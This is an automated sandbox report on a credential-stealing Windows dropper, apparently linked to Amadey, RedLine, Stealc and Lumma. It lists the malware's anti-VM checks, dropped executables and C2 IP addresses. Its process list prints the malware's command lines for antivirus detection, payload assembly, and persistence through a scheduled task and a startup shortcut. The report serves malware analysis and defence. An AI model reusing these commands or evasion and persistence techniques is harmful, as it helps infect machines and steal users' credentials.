Analysis Overview
SHA256
1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d
Threat Level: Known bad
The file 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe was found to be: Known bad.
Malicious Activity Summary
Stealc
NanoCore
Amadey
RedLine
Lumma Stealer, LummaC
RedLine payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Drops startup file
Identifies Wine through registry keys
Checks BIOS information in registry
Reads data files stored by FTP clients
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Indirect Command Execution
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Drops Chrome extension
Checks whether UAC is enabled
Checks installed software on the system
Drops desktop.ini file(s)
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates processes with tasklist
Drops file in System32 directory
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Scheduled Task/Job: Scheduled Task
Enumerates system info in registry
Modifies data under HKEY_USERS
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-08-13 22:07
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-13 22:07
Reported
2024-08-13 22:08
Platform
win7-20240704-en
Max time kernel
30s
Max time network
35s
Signatures
Amadey
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2808 created 1208 | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | C:\Windows\Explorer.EXE |
| PID 2808 created 1208 | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | C:\Windows\Explorer.EXE |
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000112001\MYNEWRDX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ExplorerProprietary | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe | N/A |
| File opened for modification | C:\Windows\EquationExplorer | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\SysOrleans | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\HostelGalleries | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| File opened for modification | C:\Windows\ChestAntique | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\TreeProfessor | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| File opened for modification | C:\Windows\ConfiguringUps | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1000112001\MYNEWRDX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe
"C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe
"C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 64
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe"
C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\0ae19c9b3d\Hkbsse.exe"
C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe
"C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 64
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe
"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe"
C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe
"C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit
C:\Users\Admin\AppData\Local\Temp\1000112001\MYNEWRDX.exe
"C:\Users\Admin\AppData\Local\Temp\1000112001\MYNEWRDX.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 40365
C:\Windows\SysWOW64\findstr.exe
findstr /V "HopeBuildersGeniusIslam" Sonic
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s
C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif
Beijing.pif s
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & echo URL="C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| CH | 185.196.11.123:80 | 185.196.11.123 | tcp |
| CH | 185.196.11.123:80 | 185.196.11.123 | tcp |
| RU | 185.215.113.17:80 | 185.215.113.17 | tcp |
| RU | 185.215.113.67:21405 | N/A | tcp |
| NL | 45.66.231.214:9932 | N/A | tcp |
| US | 8.8.8.8:53 | jSbXVBiItIINfreBHvLPHxDRe.jSbXVBiItIINfreBHvLPHxDRe | udp |
Files
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\1000002001\GOLD.exe
C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
C:\Users\Admin\AppData\Local\Temp\1000005001\newalp.exe
C:\Users\Admin\AppData\Local\Temp\1000050001\06082025.exe
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default.exe
C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe
C:\Users\Admin\AppData\Local\Temp\Continues
C:\Users\Admin\AppData\Local\Temp\1000112001\MYNEWRDX.exe
C:\Users\Admin\AppData\Local\Temp\Sonic
C:\Users\Admin\AppData\Local\Temp\Corresponding
C:\Users\Admin\AppData\Local\Temp\Mr
C:\Users\Admin\AppData\Local\Temp\Minister
C:\Users\Admin\AppData\Local\Temp\Template
C:\Users\Admin\AppData\Local\Temp\Dietary
C:\Users\Admin\AppData\Local\Temp\Speak
C:\Users\Admin\AppData\Local\Temp\Mobile
C:\Users\Admin\AppData\Local\Temp\Zinc
C:\Users\Admin\AppData\Local\Temp\Continue
C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif
C:\Users\Admin\AppData\Local\Temp\40365\s
\ProgramData\mozglue.dll
\ProgramData\nss3.dll
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-13 22:07
Reported
2024-08-13 22:10
Platform
win10v2004-20240802-en
Max time kernel
150s
Max time network
152s
Signatures
Amadey
Lumma Stealer, LummaC
NanoCore
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3076 created 3432 | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | C:\Windows\Explorer.EXE |
| PID 3076 created 3432 | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | C:\Windows\Explorer.EXE |
| PID 4876 created 3432 | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | C:\Windows\Explorer.EXE |
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000131001\PctOccurred.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
Opening HKCU\Software\Wine is a cheap test for the Wine emulation layer some analysis environments run on; the key only exists under Wine. Both the root sample and the dropped axplong.exe perform the check before doing anything else of note.
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Indirect Command Execution
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\forfiles.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WPA Monitor = "C:\\Program Files (x86)\\WPA Monitor\\wpamon.exe" | C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
Drops file in System32 directory
Every path below under C:\Windows\SysWOW64\config\systemprofile is the LocalSystem account's profile (the SysWOW64 form is the 32-bit redirection of system32), so the powershell.exe and TFXDRjP.exe activity recorded here ran as SYSTEM. The two writes by Install.exe to C:\Windows\system32\GroupPolicy (gpt.ini and Machine\Registry.pol) are edits to the local Group Policy store by a binary executing out of a %TEMP%\7zS*.tmp extraction directory; gpupdate.exe appears later in the process list, so the policy was most likely applied immediately.
| Description | Indicator | Process | Target |
